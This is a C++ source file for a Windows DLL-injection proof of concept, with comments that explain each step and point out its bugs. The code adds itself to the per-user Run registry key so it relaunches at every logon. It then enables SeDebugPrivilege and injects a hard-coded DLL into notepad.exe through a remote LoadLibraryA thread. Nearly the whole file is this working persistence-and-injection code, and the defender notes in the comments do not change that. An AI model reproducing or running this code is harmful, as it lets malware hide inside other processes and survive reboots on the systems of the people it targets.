injectdll.cpp
107 lines (99 loc) · 2.63 KB
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#include "tchar.h"
#include "tlhelp32.h"
#include "string.h"
#include <iostream>
using namespace std;
// Entry point of a DLL-injection proof of concept. In order it:
//   1. writes its own path (argv[0]) under HKCU\...\CurrentVersion\Run so it is
//      re-launched at every logon (persistence);
//   2. looks for a process named "notepad.exe" in a Toolhelp32 snapshot;
//   3. enables SeDebugPrivilege on its own token;
//   4. allocates memory in the target, writes the DLL path "c:\main.dll" there,
//      and starts a remote thread at kernel32!LoadLibraryA to load it.
// From a defender's viewpoint each of these steps is a well-known telemetry
// point: Run-key write, SeDebugPrivilege enable, and the cross-process
// VirtualAllocEx / WriteProcessMemory / CreateRemoteThread sequence.
// Note: no return type is declared; standard C++ requires an explicit `int` here.
// Every exit path yields 0 (explicit `return 0` or falling off the end of main).
main(int argc,char * argv[])
{
HKEY hkey;
// Persistence: create (or open) the per-user Run key with full access.
long reg = RegCreateKeyEx(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hkey,NULL);
if (reg != ERROR_SUCCESS)
{
return 0;
}
// Value name "injectdll.exe", data = this executable's path exactly as given in argv[0].
// strlen() excludes the terminating NUL, so the length passed for the REG_SZ data
// does not include a terminator.
reg = RegSetValueEx(hkey,"injectdll.exe",0,REG_SZ,(BYTE *)argv[0],strlen(argv[0]));
if (reg != ERROR_SUCCESS)
{
// hkey is still open on this path and is never closed.
return 0;
}
RegCloseKey(hkey);
DWORD procid;   // assigned only when "notepad.exe" is found; otherwise left indeterminate
DWORD dwflag;   // declared but never used
PROCESSENTRY32 pe32;
HANDLE procsnap;
LPCTSTR dllpath = "c:\\main.dll";   // hard-coded path of the DLL to be loaded into the target
pe32.dwSize = sizeof(pe32);
// Find the target PID by image name. (The original comment said "svchost", but the
// comparison below is against "notepad.exe".)
procsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (procsnap == INVALID_HANDLE_VALUE)
{
// Failure is only reported; execution continues with the invalid snapshot handle.
printf("fail list process!\n");
}
BOOL f = Process32First(procsnap,&pe32);
while(f)
{
// Echoes every process name / PID encountered while scanning.
printf("%s %d\n",pe32.szExeFile,pe32.th32ProcessID);
if (strcmp(pe32.szExeFile,"notepad.exe") == 0)
{
procid = pe32.th32ProcessID;
break;
}
f = Process32Next(procsnap,&pe32);
}
// Printed (and later used in OpenProcess) even when no matching process was found.
printf("\n%d\n",procid);
CloseHandle(procsnap);
// Enable SeDebugPrivilege on the current process token; this is what lets the later
// OpenProcess succeed on processes the caller could not otherwise open.
TOKEN_PRIVILEGES tp;
HANDLE token;   // never closed on any path
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&token))
{
return 0;
}
if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid))
{
return 0;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
// The condition is the constant TRUE, so the else branch below is dead code.
if(TRUE)
{
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
}
else
{
tp.Privileges[0].Attributes = 0;
}
// A nonzero return only means the call itself succeeded. When the privilege is not
// held by the token the call still returns nonzero and GetLastError() reports
// ERROR_NOT_ALL_ASSIGNED, which is not checked here.
if(!AdjustTokenPrivileges(token,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL))
{
return 0;
}
// Injection: reserve a buffer in the target, copy the DLL path into it, then run
// LoadLibraryA on that buffer from a new thread inside the target process.
HANDLE hprocess = NULL;
HANDLE hthread = NULL;
HMODULE hmodule = NULL;
LPVOID pdllbuff = NULL;
// Byte size of the path including its terminator, scaled by sizeof(TCHAR).
DWORD dllnamesize = (DWORD)(_tcslen(dllpath)+1) * sizeof(TCHAR);
DWORD writesize;
LPTHREAD_START_ROUTINE injectthreadproc;
hprocess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,procid);
// Each failure below is only printed; the next call still runs with a NULL handle / pointer.
if (hprocess == NULL)
printf("error 1");
if(!(pdllbuff = VirtualAllocEx(hprocess,NULL,dllnamesize,MEM_COMMIT,PAGE_READWRITE)))
printf("error 2");
if(WriteProcessMemory(hprocess,pdllbuff,(LPVOID)dllpath,dllnamesize,&writesize))
printf("write success");
printf("%d %d\n",dllnamesize,writesize);
// LoadLibraryA's address is resolved in this process and reused in the target; this
// presumes kernel32.dll is mapped at the same base address in both processes.
hmodule = GetModuleHandle("kernel32.dll");
DWORD threadid;
injectthreadproc = (LPTHREAD_START_ROUTINE)GetProcAddress(hmodule,"LoadLibraryA");
hthread = CreateRemoteThread(hprocess,NULL,0,injectthreadproc,pdllbuff,0,&threadid);
printf("%d",threadid);
// Block until the remote LoadLibraryA thread finishes.
WaitForSingleObject(hthread,INFINITE);
// Handle cleanup was left commented out, so hthread and hprocess remain open until exit.
//CloseHandle(hthread);
//CloseHandle(hprocess);
//printf("%d",GetLastError());
}